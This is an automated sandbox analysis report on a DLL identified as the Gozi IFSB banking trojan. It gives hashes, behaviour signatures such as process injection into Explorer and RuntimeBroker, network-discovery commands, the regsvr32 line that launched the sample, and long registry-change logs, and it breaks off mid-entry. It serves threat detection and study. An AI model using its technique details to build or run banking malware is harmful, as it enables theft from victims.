Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-lf232aafem
Target 62ea3f935563b.dll
SHA256 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

Threat Level: Known bad

The file 62ea3f935563b.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs net.exe

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Discovers systems in the same network

Gathers system information

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 09:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 09:29

Reported

2022-08-03 09:31

Platform

win7-20220715-en

Max time kernel

45s

Max time network

49s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Network

N/A

Files

memory/1908-54-0x000007FEFB6E1000-0x000007FEFB6E3000-memory.dmp

memory/1004-55-0x0000000000000000-mapping.dmp

memory/1004-56-0x0000000074DB1000-0x0000000074DB3000-memory.dmp

memory/1004-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1004-62-0x0000000000190000-0x000000000019D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 09:29

Reported

2022-08-03 09:31

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

154s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2160 set thread context of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1032 set thread context of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 set thread context of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 set thread context of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 set thread context of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03bd6acb-41d4-47b9- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000064ca497c2ca7d8017048897d2ca7d8017048897d2ca7d801ab4a11000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000336566323963656363663661323665316565653439343865326132313733653635376536383162613165353637646132313765346136323130336331306362320000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000d2ba9200330065006600320039006300650063006300660036006100320036006500310065006500650034003900340038006500320061003200310037003300650036003500370065003600380031006200610031006500350036003700640061003200310037006500340061003600320031003000330063003100300063006200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33656632396365636366366132366531656565343934386532613231373365363537653638316261316535363764613231376534613632313033633130636232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ac56ac6088d2866672963a8250dcfbb3526d3a51b9a3e861858925e66dc0f54" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3ef29ceccf6a26e1eee4948e2a2173e657e681ba1e567da217e4a62103c10cb2" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000056540a7b2ca7d80156540a7b2ca7d80156540a7b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000653435366630633931306366316530336637336363643337346662336231336432353233613534613463313762666663646235323666396234643265333035340000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000aa7c7800650034003500360066003000630039003100300063006600310065003000330066003700330063006300640033003700340066006200330062003100330064003200350032003300610035003400610034006300310037006200660066006300640062003500320036006600390062003400640032006500330030003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65343536663063393130636631653033663733636364333734666233623133643235323361353461346331376266666364623532366639623464326533303534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ada548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ada548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fff28b7a2ca7d801fff28b7a2ca7d801fff28b7a2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000376163353661633630383864323836363637323936336138323530646366626233353236643361353162396133653836313835383932356536366463306635340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000001def600370061006300350036006100630036003000380038006400320038003600360036003700320039003600330061003800320035003000640063006600620062003300350032003600640033006100350031006200390061003300650038003600310038003500380039003200350065003600360064006300300066003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37616335366163363038386432383636363732393633613832353064636662623335323664336135316239613365383631383538393235653636646330663534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002e16f07a2ca7d8012e16f07a2ca7d8012e16f07a2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000336566323963656363663661323665316565653439343865326132313733653635376536383162613165353637646132313765346136323130336331306362320000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000d2ba9200330065006600320039006300650063006300660036006100320036006500310065006500650034003900340038006500320061003200310037003300650036003500370065003600380031006200610031006500350036003700640061003200310037006500340061003600320031003000330063003100300063006200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33656632396365636366366132366531656565343934386532613231373365363537653638316261316535363764613231376534613632313033633130636232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad6548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad6548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = ff90a47e2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\891988337bcfabadc26731d12a13cf2af72b95139a9f6220c62e6fba3cc17ce3" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = 